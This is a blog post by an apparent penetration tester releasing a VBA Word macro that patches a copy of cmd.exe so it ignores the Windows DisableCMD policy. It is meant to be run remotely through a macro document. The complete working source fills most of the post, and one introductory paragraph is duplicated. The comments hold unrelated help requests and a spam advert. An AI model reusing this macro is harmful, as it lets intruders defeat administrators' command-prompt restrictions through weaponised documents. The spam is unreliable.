DisableCMD - History Repeating
Before I start. This is nothing new! Actually its known since many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)
During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.
Here is a short video about it:
I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.
During a pentest i needed to patch cmd.exe to ignore the disablecmd policy setting. Nothing new, nothing special, but i needed to do it from remote and i had to use VBA/Word macros. Long story short, i decided to release the code, because its nothing special and the technique is well known.
Here is a short video about it:
VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.
Short video showing my VBA byte patcher written to overcome DisableCMD policy setting. Sorry but i at least expected a fail safe behavior.
I am not any good in coding vba but it might save someone some time. I will add an example.doc on remote-exploit.org as well.
Sub patchcmd()
Dim Sourcefile As String, TargetFile As String, Windir As String, Tempdir As String
Dim F1 As Integer, F2 As Integer
Dim bytepattern(19) As Byte
Dim WshShell As Object
Set WshShell = CreateObject("WScript.Shell")
Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")
bytepattern(0) = &H44 'D
bytepattern(1) = &H0
bytepattern(2) = &H69 'i
bytepattern(3) = &H0
bytepattern(4) = &H73 's
bytepattern(5) = &H0
bytepattern(6) = &H61 'a
bytepattern(7) = &H0
bytepattern(8) = &H62 'b
bytepattern(9) = &H0
bytepattern(10) = &H6C 'l
bytepattern(11) = &H0
bytepattern(12) = &H65 'e
bytepattern(13) = &H0
bytepattern(14) = &H43 'C
bytepattern(15) = &H0
bytepattern(16) = &H4D 'M
bytepattern(17) = &H0
bytepattern(18) = &H44 'D
Dim fileoffset As Long
fileoffset = 0
Dim patternoffset As Long
patternoffset = 0
Dim gotbad As Boolean
gotbad = False
Sourcefile = Windir & "\system32\cmd.exe"
Destfile = Tempdir & "\dmc.exe"
Dim tmpbyte As Byte
If Dir(Sourcefile) = "" Then Exit Sub
FileCopy Sourcefile, Destfile
F1 = FreeFile
Open Sourcefile For Binary As F1
F2 = FreeFile
Open Destfile For Binary As F2
While Not EOF(F1)
gotbad = False
Get #F1, , tmpbyte
If tmpbyte = bytepattern(patternoffset) Then
fileoffset = (Seek(F1) - 1)
While (gotbad = False)
Get #F1, , tmpbyte
patternoffset = patternoffset + 1
If tmpbyte = bytepattern(patternoffset) Then
If patternoffset > 18 Then
'Debug.Print "Found DisableCMD and position: " & fileoffset & "Patching it now"
Put #F2, fileoffset + 6, &H34
Close F1
Close F2
MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
End
End If
Else
patternoffset = 0
gotbad = True
End If
Wend
End If
Wend
Close F1
Close F2
End Sub
posted by Max at
8:45 PM
5 Comments:
you are pro in security MAX!
HELLO, CAN YOU HELP ME WITH BACK TRACK 4?? I CAN'TJUST THAT I CANT FIND SUPPORT, I JUST CANT CONNECT TO INTERNET IN WIRED MODE, AND MY CONNECTION IS GOOD, BECAUSE I HAVE WINDOWS TOO, AND IN IT WORKS FINE.. CAN YOU HELP ME PLEASE:d! charlystaff@hotmail.com
I know it's irrelevant but i started using wyd 0.2 and i see this error:
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at Desktop/wyd-0.2/wyd.pl line 284.
i couldn't find anything about it on the net.
i thought maybe you can help me.
Did you solved your problem Saeed_Mehraban.. I am having the same trouble as you did
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at ./wyd-0.2/wyd.pl line 284.
Can someone help or explain what is going wrong ?
Thanks
Slots | Vegas: Casinos Near Me | MapYRO
i’y casinos 구리 출장마사지 and hotels 구미 출장샵 in Las Vegas and surrounding states. Find your nearest Vegas 인천광역 출장마사지 casinos and 춘천 출장마사지 hotels 남양주 출장마사지 in realtime and see
Post a Comment
Subscribe to Post Comments [Atom]
<< Home